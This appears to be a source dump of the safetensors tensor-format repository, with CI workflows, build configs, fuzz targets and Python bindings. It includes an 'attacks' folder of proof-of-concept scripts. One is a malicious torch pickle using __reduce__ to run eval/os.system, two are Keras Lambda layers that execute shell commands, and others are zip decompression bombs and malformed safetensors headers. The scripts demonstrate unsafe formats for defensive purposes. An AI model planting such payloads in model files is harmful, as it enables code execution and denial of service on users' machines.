├── codecov.yaml
├── codecov.yml
├── safetensors
├── LICENSE
├── README.md
├── fuzz
│ ├── .gitignore
│ ├── fuzz_targets
│ │ └── fuzz_target_1.rs
│ └── Cargo.toml
├── src
│ └── lib.rs
├── Cargo.toml
└── benches
│ └── benchmark.rs
├── bindings
└── python
│ ├── tests
│ ├── data
│ │ └── __init__.py
│ ├── test_handle.py
│ ├── test_mlx_comparison.py
│ ├── test_flax_comparison.py
│ ├── test_tf_comparison.py
│ ├── test_threadable.py
│ ├── test_paddle_comparison.py
│ └── test_pt_model.py
│ ├── py_src
│ └── safetensors
│ │ ├── py.typed
│ │ ├── __init__.py
│ │ ├── flax.py
│ │ ├── mlx.py
│ │ ├── tensorflow.py
│ │ ├── __init__.pyi
│ │ ├── numpy.py
│ │ └── paddle.py
│ ├── MANIFEST.in
│ ├── Cargo.toml
│ ├── fuzz.py
│ ├── .gitignore
│ ├── README.md
│ ├── setup.cfg
│ ├── Makefile
│ ├── convert_all.py
│ ├── benches
│ ├── test_paddle.py
│ ├── test_flax.py
│ ├── test_mlx.py
│ ├── test_tf.py
│ └── test_pt.py
│ ├── pyproject.toml
│ ├── src
│ └── view.rs
│ └── stub.py
├── .github
├── ISSUE_TEMPLATE
│ ├── config.yml
│ ├── feature-request.yml
│ └── bug-report.yml
├── conda
│ ├── bld.bat
│ ├── build.sh
│ └── meta.yaml
├── workflows
│ ├── delete_doc_comment_trigger.yml
│ ├── delete_doc_comment.yml
│ ├── trufflehog.yml
│ ├── stale.yml
│ ├── upload_pr_documentation.yml
│ ├── build_documentation.yml
│ ├── build_pr_documentation.yml
│ ├── rust-release.yml
│ ├── codecov.yml
│ ├── rust.yml
│ ├── python-bench.yml
│ ├── python-release-conda.yml
│ ├── python-release.yml
│ └── python.yml
├── stale.yml
└── PULL_REQUEST_TEMPLATE.md
├── .dockerignore
├── Makefile
├── attacks
├── tf_safe_ace_get_pwned.py
├── torch_ace_get_pwned.py
├── paddle_ace_get_pwned.py
├── numpy_dos_create.py
├── tf_safe_ace_create.py
├── numpy_dos_get_pwned.py
├── torch_dos_get_pwned.py
├── tf_ace_get_pwned.py
├── tf_ace_create.py
├── torch_ace_create.py
├── safetensors_abuse_attempt_1.py
├── torch_dos_create.py
├── safetensors_abuse_attempt_3.py
├── safetensors_abuse_attempt_2.py
├── paddle_ace_create.py
└── README.md
├── .gitignore
├── docs
├── source
│ ├── api
│ │ ├── flax.mdx
│ │ ├── numpy.mdx
│ │ ├── paddle.mdx
│ │ ├── tensorflow.mdx
│ │ └── torch.mdx
│ ├── _toctree.yml
│ ├── convert-weights.md
│ ├── speed.mdx
│ ├── index.mdx
│ ├── torch_shared_tensors.mdx
│ └── metadata_parsing.mdx
└── safetensors.schema.json
├── flake.lock
├── flake.nix
├── Dockerfile.s390x.test
├── .pre-commit-config.yaml
├── RELEASE.md
└── README.md
/codecov.yaml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/safetensors/LICENSE:
--------------------------------------------------------------------------------
1 | ../LICENSE
--------------------------------------------------------------------------------
/safetensors/README.md:
--------------------------------------------------------------------------------
1 | ../README.md
--------------------------------------------------------------------------------
/bindings/python/tests/data/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/py.typed:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/safetensors/fuzz/.gitignore:
--------------------------------------------------------------------------------
1 | target
2 | corpus
3 | artifacts
4 | coverage
5 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: true
2 | version: 2.1
3 |
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | bindings/python/target
3 | Dockerfile.s390x.test
4 |
--------------------------------------------------------------------------------
/.github/conda/bld.bat:
--------------------------------------------------------------------------------
1 | cd bindings\python
2 | %PYTHON% -m pip install . --prefix=%PREFIX%
3 |
--------------------------------------------------------------------------------
/.github/conda/build.sh:
--------------------------------------------------------------------------------
1 | cd bindings/python
2 | $PYTHON -m pip install . --prefix=$PREFIX
3 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | doc:
2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd ..
3 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 | new_model = tf.keras.models.load_model("tf_ace.keras")
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | safetensors/**/Cargo.lock
3 | bindings/python/Cargo.lock
4 | *.bin
5 | *.h5
6 | *.msgpack
7 | *.pt
8 | *.pdparams
9 | *.safetensors
10 | *.npz
11 |
--------------------------------------------------------------------------------
/docs/source/api/flax.mdx:
--------------------------------------------------------------------------------
1 | # Flax API
2 |
3 | [[autodoc]] safetensors.flax.load_file
4 | [[autodoc]] safetensors.flax.load
5 | [[autodoc]] safetensors.flax.save_file
6 | [[autodoc]] safetensors.flax.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/numpy.mdx:
--------------------------------------------------------------------------------
1 | # Numpy API
2 |
3 | [[autodoc]] safetensors.numpy.load_file
4 | [[autodoc]] safetensors.numpy.load
5 | [[autodoc]] safetensors.numpy.save_file
6 | [[autodoc]] safetensors.numpy.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/paddle.mdx:
--------------------------------------------------------------------------------
1 | # PaddlePaddle API
2 |
3 | [[autodoc]] safetensors.paddle.load_file
4 | [[autodoc]] safetensors.paddle.load
5 | [[autodoc]] safetensors.paddle.save_file
6 | [[autodoc]] safetensors.paddle.save
7 |
--------------------------------------------------------------------------------
/attacks/torch_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 | weights = torch.load("torch_ace.pt")
4 | assert list(weights.keys()) == ["weight"]
5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/docs/source/api/tensorflow.mdx:
--------------------------------------------------------------------------------
1 | # Tensorflow API
2 |
3 | [[autodoc]] safetensors.tensorflow.load_file
4 | [[autodoc]] safetensors.tensorflow.load
5 | [[autodoc]] safetensors.tensorflow.save_file
6 | [[autodoc]] safetensors.tensorflow.save
7 |
--------------------------------------------------------------------------------
/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs:
--------------------------------------------------------------------------------
1 | #![no_main]
2 |
3 | use libfuzzer_sys::fuzz_target;
4 | use safetensors::tensor::SafeTensors;
5 |
6 | fuzz_target!(|data: &[u8]| {
7 | let _ = SafeTensors::deserialize(data);
8 | });
9 |
--------------------------------------------------------------------------------
/bindings/python/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include Cargo.toml
2 | include pyproject.toml
3 | include rust-toolchain
4 | include ../../LICENSE
5 | recursive-include src *
6 | recursive-include safetensors-lib *
7 | recursive-exclude safetensors-lib/target *
8 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import paddle
2 |
3 | weights = paddle.load("paddle_ace.pdparams")[0]
4 | assert list(weights.keys()) == ["weight"]
5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.py:
--------------------------------------------------------------------------------
1 | # Re-export this
2 | from ._safetensors_rust import ( # noqa: F401
3 | SafetensorError,
4 | __version__,
5 | deserialize,
6 | safe_open,
7 | _safe_open_handle,
8 | serialize,
9 | serialize_file,
10 | )
11 |
--------------------------------------------------------------------------------
/docs/source/api/torch.mdx:
--------------------------------------------------------------------------------
1 | # Torch API
2 |
3 | [[autodoc]] safetensors.torch.load_file
4 | [[autodoc]] safetensors.torch.load
5 | [[autodoc]] safetensors.torch.save_file
6 | [[autodoc]] safetensors.torch.save
7 | [[autodoc]] safetensors.torch.load_model
8 | [[autodoc]] safetensors.torch.save_model
9 |
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment_trigger.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment trigger
2 |
3 | on:
4 | pull_request:
5 | types: [ closed ]
6 |
7 | jobs:
8 | delete:
9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
10 | with:
11 | pr_number: ${{ github.event.number }}
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Delete doc comment trigger"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | delete:
11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
12 | secrets:
13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/attacks/numpy_dos_create.py:
--------------------------------------------------------------------------------
1 | from zipfile import ZIP_DEFLATED, ZipFile
2 |
3 | FILESIZE = 40 * 1000 # 40 Go
4 | BUFFER = b"\0" * 1000 * 1000 # 1Mo
5 |
6 | outfilename = "numpy_dos.npz"
7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
8 | with outzip.open("weights.npy", "w", force_zip64=True) as f:
9 | for i in range(FILESIZE):
10 | f.write(BUFFER)
11 |
--------------------------------------------------------------------------------
/.github/workflows/trufflehog.yml:
--------------------------------------------------------------------------------
1 | on:
2 | push:
3 |
4 | name: Secret Leaks
5 |
6 | jobs:
7 | trufflehog:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - name: Checkout code
11 | uses: actions/checkout@v6
12 | with:
13 | fetch-depth: 0
14 | - name: Secret Scanning
15 | uses: trufflesecurity/trufflehog@main
16 | with:
17 | extra_args: --results=verified,unknown
18 |
19 |
20 |
--------------------------------------------------------------------------------
/.github/workflows/stale.yml:
--------------------------------------------------------------------------------
1 | name: 'Close stale issues and PRs'
2 | on:
3 | schedule:
4 | - cron: '30 1 * * *'
5 |
6 | jobs:
7 | stale:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - uses: actions/stale@v10
11 | with:
12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
13 | days-before-stale: 30
14 | days-before-close: 5
15 |
--------------------------------------------------------------------------------
/.github/workflows/upload_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Upload PR Documentation
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Build PR Documentation"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | build:
11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
12 | with:
13 | package_name: safetensors
14 | secrets:
15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | model.save("tf_ace.keras", save_format="keras_v3")
18 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import numpy as np
4 |
5 | filename = "numpy_dos.npz"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | archive = np.load(filename)
13 | weights = archive["weight"]
14 | assert np.allclose(weights, np.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/bindings/python/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-python"
3 | version = "0.7.0-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 |
7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
8 | [lib]
9 | name = "safetensors_rust"
10 | crate-type = ["cdylib"]
11 |
12 | [dependencies]
13 | pyo3 = { version = "0.25", features = ["abi3", "abi3-py38"] }
14 | memmap2 = "0.9"
15 | serde_json = "1.0"
16 |
17 | [dependencies.safetensors]
18 | path = "../../safetensors"
19 |
--------------------------------------------------------------------------------
/attacks/torch_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import torch
4 |
5 | filename = "torch_dos.pt"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | weights = torch.load(filename)
13 | assert list(weights.keys()) == ["weight"]
14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/safetensors/fuzz/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-fuzz"
3 | version = "0.0.0"
4 | publish = false
5 | edition = "2021"
6 |
7 | [package.metadata]
8 | cargo-fuzz = true
9 |
10 | [dependencies]
11 | libfuzzer-sys = "0.4"
12 |
13 | [dependencies.safetensors]
14 | path = ".."
15 |
16 | # Prevent this from interfering with workspaces
17 | [workspace]
18 | members = ["."]
19 |
20 | [profile.release]
21 | debug = 1
22 |
23 | [[bin]]
24 | name = "fuzz_target_1"
25 | path = "fuzz_targets/fuzz_target_1.rs"
26 | test = false
27 | doc = false
28 |
--------------------------------------------------------------------------------
/attacks/tf_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import json
3 |
4 | import h5py
5 | import tensorflow as tf
6 |
7 | new_model = tf.keras.models.load_model("tf.h5")
8 |
9 | print("Transformers is not vulnerable to this, as it uses h5 directly.")
10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file")
11 | print("Let's show you the marshalled code")
12 |
13 | with h5py.File("tf_ace.h5") as f:
14 | data = json.loads(f.attrs["model_config"])
15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
16 | pass
17 |
--------------------------------------------------------------------------------
/attacks/tf_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | ###
18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
19 |
20 | model.save("tf_ace.h5")
21 | ###
22 |
--------------------------------------------------------------------------------
/.github/conda/meta.yaml:
--------------------------------------------------------------------------------
1 | {% set name = "safetensors" %}
2 |
3 | package:
4 | name: "{{ name|lower }}"
5 | version: "{{ SAFETENSORS_VERSION }}"
6 |
7 | source:
8 | path: ../../
9 |
10 | requirements:
11 | host:
12 | - pip
13 | - python x.x
14 | - setuptools
15 | - setuptools-rust
16 | - maturin
17 |
18 | run:
19 | - python x.x
20 |
21 | test:
22 | imports:
23 | - safetensors
24 |
25 | about:
26 | home: https://huggingface.co/docs/safetensors
27 | license: Apache License 2.0
28 | license_file: LICENSE
29 | summary: "Safe and portable way of storing tensors"
30 |
--------------------------------------------------------------------------------
/attacks/torch_ace_create.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 |
4 | class BadDict(dict):
5 | def __init__(self, src: str, **kwargs):
6 | super().__init__(**kwargs)
7 | self.src = src
8 |
9 | def __reduce__(self):
10 | return (
11 | eval,
12 | (f"os.system('{self.src}') or dict()",),
13 | None,
14 | None,
15 | iter(self.items()),
16 | )
17 |
18 |
19 | torch.save(
20 | BadDict(
21 | 'echo "pwned your computer, I can do anything I want."',
22 | **{"weight": torch.zeros((2, 2))},
23 | ),
24 | "torch_ace.pt",
25 | )
26 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_1.py:
--------------------------------------------------------------------------------
1 | import torch
2 | from safetensors.torch import load_file, save_file
3 |
4 | filename = "safetensors_abuse_attempt_1.safetensors"
5 |
6 |
7 | def create_payload():
8 | weights = {"weight": torch.zeros((2, 2))}
9 | save_file(weights, filename)
10 |
11 | with open(filename, "r+b") as f:
12 | f.seek(0)
13 | # Now the header claims 2**32 - xx even though the file is small
14 | n = 1000
15 | n_bytes = n.to_bytes(8, "little")
16 | f.write(n_bytes)
17 |
18 |
19 | create_payload()
20 | # This properly crashes with an out of bounds exception.
21 | test = load_file(filename)
22 |
--------------------------------------------------------------------------------
/flake.lock:
--------------------------------------------------------------------------------
1 | {
2 | "nodes": {
3 | "nixpkgs": {
4 | "locked": {
5 | "lastModified": 1730531603,
6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=",
7 | "owner": "NixOS",
8 | "repo": "nixpkgs",
9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d",
10 | "type": "github"
11 | },
12 | "original": {
13 | "owner": "NixOS",
14 | "ref": "nixos-unstable",
15 | "repo": "nixpkgs",
16 | "type": "github"
17 | }
18 | },
19 | "root": {
20 | "inputs": {
21 | "nixpkgs": "nixpkgs"
22 | }
23 | }
24 | },
25 | "root": "root",
26 | "version": 7
27 | }
28 |
--------------------------------------------------------------------------------
/docs/source/_toctree.yml:
--------------------------------------------------------------------------------
1 | - sections:
2 | - local: index
3 | title: 🤗 Safetensors
4 | - local: speed
5 | title: Speed Comparison
6 | - local: torch_shared_tensors
7 | title: Tensor Sharing in Pytorch
8 | - local: metadata_parsing
9 | title: Metadata Parsing
10 | - local: convert-weights
11 | title: Convert weights to safetensors
12 | title: Getting started
13 | - sections:
14 | - local: api/torch
15 | title: Torch API
16 | - local: api/tensorflow
17 | title: Tensorflow API
18 | - local: api/paddle
19 | title: PaddlePaddle API
20 | - local: api/flax
21 | title: Flax API
22 | - local: api/numpy
23 | title: Numpy API
24 | title: API
25 |
--------------------------------------------------------------------------------
/.github/workflows/build_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build documentation
2 |
3 | on:
4 | push:
5 | branches:
6 | - main
7 | - doc-builder*
8 | - v*-release
9 | - use_templates
10 |
11 | jobs:
12 | build:
13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main
14 | with:
15 | commit_sha: ${{ github.sha }}
16 | package: safetensors
17 | notebook_folder: safetensors_doc
18 | package_path: safetensors/bindings/python/
19 | version_tag_suffix: bindings/python/py_src/
20 | install_rust: true
21 | secrets:
22 | token: ${{ secrets.HUGGINGFACE_PUSH }}
23 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
24 |
--------------------------------------------------------------------------------
/.github/stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/.github/workflows/build_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build PR Documentation
2 |
3 | on:
4 | pull_request:
5 | paths:
6 | - "docs/**"
7 | - "bindings/python/py_src/**"
8 | - ".github/workflows/build_pr_documentation.yml"
9 |
10 | concurrency:
11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
12 | cancel-in-progress: true
13 |
14 | jobs:
15 | build:
16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main
17 | with:
18 | commit_sha: ${{ github.event.pull_request.head.sha }}
19 | pr_number: ${{ github.event.number }}
20 | package: safetensors
21 | package_path: safetensors/bindings/python/
22 | version_tag_suffix: bindings/python/py_src/
23 | install_rust: true
24 |
--------------------------------------------------------------------------------
/.github/workflows/rust-release.yml:
--------------------------------------------------------------------------------
1 | name: Rust Release
2 |
3 | env:
4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }}
5 |
6 | on:
7 | push:
8 | tags:
9 | - v*
10 |
11 | jobs:
12 | rust_publish:
13 | runs-on: ubuntu-latest
14 | steps:
15 | - name: Checkout repository
16 | uses: actions/checkout@v6
17 |
18 | - uses: dtolnay/rust-toolchain@stable
19 | - name: Cache Cargo Registry
20 | uses: actions/cache@v5
21 | with:
22 | path: ~/.cargo/registry
23 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }}
24 |
25 | - name: Publish package rust
26 | if: ${{ !contains(github.ref, 'rc') }}
27 | working-directory: ./safetensors
28 | run: cargo publish --token ${CRATES_TOKEN}
29 |
30 |
--------------------------------------------------------------------------------
/attacks/torch_dos_create.py:
--------------------------------------------------------------------------------
1 | import os
2 | from zipfile import ZIP_DEFLATED, ZipFile
3 |
4 | import torch
5 |
6 | FILESIZE = 40 * 1000 # 40 Go
7 | BUFFER = b"\0" * 1000 * 1000 # 1 Mo
8 |
9 | filename = "torch_dos_tmp.pt"
10 | torch.save({"weight": torch.zeros((2, 2))}, filename)
11 |
12 |
13 | with ZipFile(filename, "r") as torch_zip:
14 | outfilename = "torch_dos.pt"
15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read())
18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f:
19 | for i in range(FILESIZE):
20 | f.write(BUFFER)
21 |
22 | os.remove(filename)
23 |
--------------------------------------------------------------------------------
/bindings/python/fuzz.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import sys
3 | import tempfile
4 | from collections import defaultdict
5 |
6 | import atheris
7 |
8 |
9 | with atheris.instrument_imports():
10 | from safetensors.torch import load_file
11 |
12 |
13 | EXCEPTIONS = defaultdict(int)
14 | START = datetime.datetime.now()
15 | DT = datetime.timedelta(seconds=30)
16 |
17 |
18 | def TestOneInput(data):
19 | global START
20 | with tempfile.NamedTemporaryFile() as f:
21 | f.write(data)
22 | f.seek(0)
23 | try:
24 | load_file(f.name, device=0)
25 | except Exception as e:
26 | EXCEPTIONS[str(e)] += 1
27 |
28 | if datetime.datetime.now() - START > DT:
29 | for e, n in EXCEPTIONS.items():
30 | print(e, n)
31 | START = datetime.datetime.now()
32 |
33 |
34 | atheris.Setup(sys.argv, TestOneInput)
35 | atheris.Fuzz()
36 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_3.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [200, 200]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
15 |
16 | binary = json.dumps(metadata).encode("utf-8")
17 | n = len(binary)
18 | n_header = n.to_bytes(8, "little")
19 |
20 | with open(filename, "wb") as f:
21 | f.write(n_header)
22 | f.write(binary)
23 | f.write(b"\0" * n)
24 |
25 |
26 | create_payload()
27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
28 | start = datetime.datetime.now()
29 | test = load_file(filename)
30 | print(f"Loading the file took {datetime.datetime.now() - start}")
31 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_2.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [2, 2]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {
15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
16 | }
17 |
18 | binary = json.dumps(metadata).encode("utf-8")
19 | n = len(binary)
20 | n_header = n.to_bytes(8, "little")
21 |
22 | with open(filename, "wb") as f:
23 | f.write(n_header)
24 | f.write(binary)
25 | f.write(b"\0" * n)
26 |
27 |
28 | create_payload()
29 |
30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
31 | start = datetime.datetime.now()
32 | test = load_file(filename)
33 | print(f"Loading the file took {datetime.datetime.now() - start}")
34 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What does this PR do?
2 |
3 |
12 |
13 |
14 |
15 | Fixes # (issue) or description of the problem this PR solves.
16 |
--------------------------------------------------------------------------------
/.github/workflows/codecov.yml:
--------------------------------------------------------------------------------
1 | name: Code coverage
2 | on:
3 | push:
4 | branches:
5 | - main
6 |
7 | jobs:
8 | build:
9 | runs-on: ubuntu-latest
10 | defaults:
11 | run:
12 | working-directory: ./safetensors
13 |
14 | steps:
15 | - uses: actions/checkout@v6
16 |
17 | - name: Install Rust Stable
18 | uses: dtolnay/rust-toolchain@stable
19 | with:
20 | components: llvm-tools-preview
21 | override: true
22 |
23 | - uses: Swatinem/rust-cache@v2
24 |
25 | - name: Install cargo-llvm-cov for Ubuntu
26 | run: cargo install cargo-llvm-cov
27 |
28 | - name: Coverage report
29 | run: cargo llvm-cov --release --lcov --output-path lcov.info
30 |
31 | - name: Upload to codecov.io
32 | uses: codecov/codecov-action@v5
33 | with:
34 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
35 | working-directory: ./safetensors
36 | fail_ci_if_error: true
37 |
--------------------------------------------------------------------------------
/bindings/python/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | .pytest_cache/
4 | *.py[cod]
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | .venv/
12 | env/
13 | bin/
14 | build/
15 | develop-eggs/
16 | dist/
17 | eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | include/
24 | man/
25 | venv/
26 | *.egg-info/
27 | .installed.cfg
28 | *.egg
29 |
30 | # Installer logs
31 | pip-log.txt
32 | pip-delete-this-directory.txt
33 | pip-selfcheck.json
34 |
35 | # Unit test / coverage reports
36 | htmlcov/
37 | .tox/
38 | .coverage
39 | .cache
40 | nosetests.xml
41 | coverage.xml
42 |
43 | # Translations
44 | *.mo
45 |
46 | # Mr Developer
47 | .mr.developer.cfg
48 | .project
49 | .pydevproject
50 |
51 | # Rope
52 | .ropeproject
53 |
54 | # Django stuff:
55 | *.log
56 | *.pot
57 |
58 | .DS_Store
59 |
60 | # Sphinx documentation
61 | docs/_build/
62 |
63 | # PyCharm
64 | .idea/
65 |
66 | # VSCode
67 | .vscode/
68 |
69 | # Pyenv
70 | .python-version
71 |
--------------------------------------------------------------------------------
/flake.nix:
--------------------------------------------------------------------------------
1 | {
2 | inputs = {
3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
4 | };
5 |
6 | outputs =
7 | { nixpkgs, ... }:
8 | let
9 | forAllSystems = nixpkgs.lib.genAttrs [
10 | "aarch64-linux"
11 | "x86_64-linux"
12 | "aarch64-darwin"
13 | ];
14 | in
15 | {
16 | devShells = forAllSystems (
17 | system:
18 | let
19 | pkgs = nixpkgs.legacyPackages.${system};
20 | in
21 | {
22 | default = pkgs.mkShell {
23 | buildInputs = with pkgs; [
24 | rustup
25 | python3Packages.python
26 | python3Packages.venvShellHook
27 | ];
28 | venvDir = "./.venv";
29 | postVenvCreation = ''
30 | unset SOURCE_DATE_EPOCH
31 | '';
32 | postShellHook = ''
33 | unset SOURCE_DATE_EPOCH
34 | '';
35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib";
36 | };
37 |
38 | }
39 | );
40 | };
41 | }
42 |
--------------------------------------------------------------------------------
/bindings/python/README.md:
--------------------------------------------------------------------------------
1 | ## Installation
2 |
3 | ```
4 | pip install safetensors
5 | ```
6 |
7 |
8 | ## Usage
9 |
10 | ### Numpy
11 |
12 | ```python
13 | from safetensors.numpy import save_file, load_file
14 | import numpy as np
15 |
16 | tensors = {
17 | "a": np.zeros((2, 2)),
18 | "b": np.zeros((2, 3), dtype=np.uint8)
19 | }
20 |
21 | save_file(tensors, "./model.safetensors")
22 |
23 |
24 | # Now loading
25 | loaded = load_file("./model.safetensors")
26 | ```
27 |
28 | ### Torch
29 |
30 | ```python
31 | from safetensors.torch import save_file, load_file
32 | import torch
33 |
34 | tensors = {
35 | "a": torch.zeros((2, 2)),
36 | "b": torch.zeros((2, 3), dtype=torch.uint8)
37 | }
38 |
39 | save_file(tensors, "./model.safetensors")
40 |
41 |
42 | # Now loading
43 | loaded = load_file("./model.safetensors")
44 | ```
